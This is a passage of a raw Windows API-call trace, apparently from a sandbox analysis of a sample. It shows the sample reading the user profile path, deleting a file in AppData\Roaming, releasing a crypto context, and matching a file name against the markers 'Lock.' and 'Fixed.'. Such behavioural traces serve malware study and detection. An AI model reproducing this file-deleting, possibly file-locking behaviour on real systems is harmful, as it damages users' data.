CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0152.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7080, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0152.313] CryptReleaseContext (hProv=0x9bf000, dwFlags=0x0) returned 1 [0152.314] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0152.314] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0152.314] FreeLibrary (hLibModule=0x76390000) returned 1 [0152.314] CloseHandle (hObject=0x4f8) returned 1 [0152.316] CloseHandle (hObject=0x4a4) returned 1 [0152.319] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0152.319] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0152.320] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/xin7s.odp", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\xin7s.odp", lpFilePart=0x8cedf4*="xin7s.odp") returned 0x29 [0152.320] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\xin7s.odp" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\xin7s.odp")) returned 0x20 [0152.320] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\xin7s.odp", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf02b7c0, ftCreationTime.dwHighDateTime=0x1d5d233, ftLastAccessTime.dwLowDateTime=0xe104e200, ftLastAccessTime.dwHighDateTime=0x1d5cb30, ftLastWriteTime.dwLowDateTime=0xe104e200, ftLastWriteTime.dwHighDateTime=0x1d5cb30, nFileSizeHigh=0x0, nFileSizeLow=0x14669, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="xin7s.odp", cAlternateFileName="")) returned 0x9e1c38 [0152.320] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\xin7s.odp" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\xin7s.odp")) returned 1 [0152.330] FindNextFileW (in: hFindFile=0x9e1c38, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf02b7c0, ftCreationTime.dwHighDateTime=0x1d5d233, ftLastAccessTime.dwLowDateTime=0xe104e200, ftLastAccessTime.dwHighDateTime=0x1d5cb30, ftLastWriteTime.dwLowDateTime=0xe104e200, ftLastWriteTime.dwHighDateTime=0x1d5cb30, nFileSizeHigh=0x0, nFileSizeLow=0x14669, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="xin7s.odp", cAlternateFileName="")) returned 0 [0152.330] FindClose (in: hFindFile=0x9e1c38 | out: hFindFile=0x9e1c38) returned 1 [0152.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0152.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0152.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0152.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0152.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0152.330] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0152.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0152.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0152.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0152.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0152.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0152.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0152.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0152.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0152.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0152.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0152.330] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0152.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0152.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0152.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9178 [0152.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0152.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0152.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9220 [0152.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0152.331] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0152.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0152.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0152.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0152.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0152.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0152.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0152.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0152.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0152.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0152.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0152.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0152.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0152.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0152.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0152.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0152.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0152.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0152.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0152.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0152.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0152.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0152.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0152.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0152.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0152.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0152.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0152.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0152.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0152.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0152.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0152.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0152.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0152.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0152.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0152.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0152.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0152.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0152.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x54) returned 0x2a5fae0 [0152.332] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/xin7s.odp", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\xin7s.odp", lpFilePart=0x8cf650*="xin7s.odp") returned 0x29 [0152.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5fae0 | out: hHeap=0x2af0000) returned 1 [0152.332] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\xin7s.odp" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\xin7s.odp")) returned 0xffffffff [0152.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0152.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0152.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0152.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0152.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0152.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0152.332] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0152.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0152.333] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0152.333] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0152.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0152.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0152.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0152.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0152.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0152.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0152.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0152.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0152.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0152.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0152.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0152.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0152.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0152.333] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x_7SfFt5-eJAhmf88.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0152.333] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_7SfFt5-eJAhmf88.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0152.333] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7SfFt5-eJAhmf88.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0152.333] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SfFt5-eJAhmf88.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0152.333] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fFt5-eJAhmf88.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0152.333] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ft5-eJAhmf88.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0152.333] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t5-eJAhmf88.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0152.333] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5-eJAhmf88.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0152.333] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-eJAhmf88.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0152.333] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eJAhmf88.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0152.333] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAhmf88.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0152.333] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ahmf88.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0152.333] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hmf88.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0152.333] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mf88.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0152.333] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f88.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0152.333] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="88.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0152.333] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0152.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0152.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0152.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0152.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0152.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0152.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0152.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0152.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0152.334] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0152.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0152.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0152.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0152.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0152.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0152.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0152.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0152.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0152.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0152.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0152.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0152.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0152.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0152.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0152.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0152.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0152.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0152.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0152.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2c) returned 0x2aa66f0 [0152.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0152.335] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x_7SfFt5-eJAhmf88.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0152.335] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_7SfFt5-eJAhmf88.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0152.335] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7SfFt5-eJAhmf88.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0152.335] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SfFt5-eJAhmf88.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0152.335] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fFt5-eJAhmf88.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0152.335] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ft5-eJAhmf88.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0152.335] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t5-eJAhmf88.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0152.335] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5-eJAhmf88.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0152.335] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-eJAhmf88.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0152.335] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eJAhmf88.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0152.335] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAhmf88.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0152.335] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ahmf88.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0152.335] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hmf88.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0152.335] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mf88.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0152.335] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f88.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0152.335] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="88.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0152.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0152.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6728 [0152.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0152.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6728 | out: hHeap=0x2af0000) returned 1 [0152.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0152.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0152.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0152.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0152.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0152.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0152.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0152.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0152.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0152.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0152.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0152.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0152.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0152.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0152.336] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0152.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0152.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0152.336] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0152.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0152.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0152.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0152.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ac8 [0152.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0152.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0152.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0152.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0152.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0152.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0152.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0152.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0152.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0152.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0152.336] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0152.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0152.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0152.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0152.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0152.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0152.336] 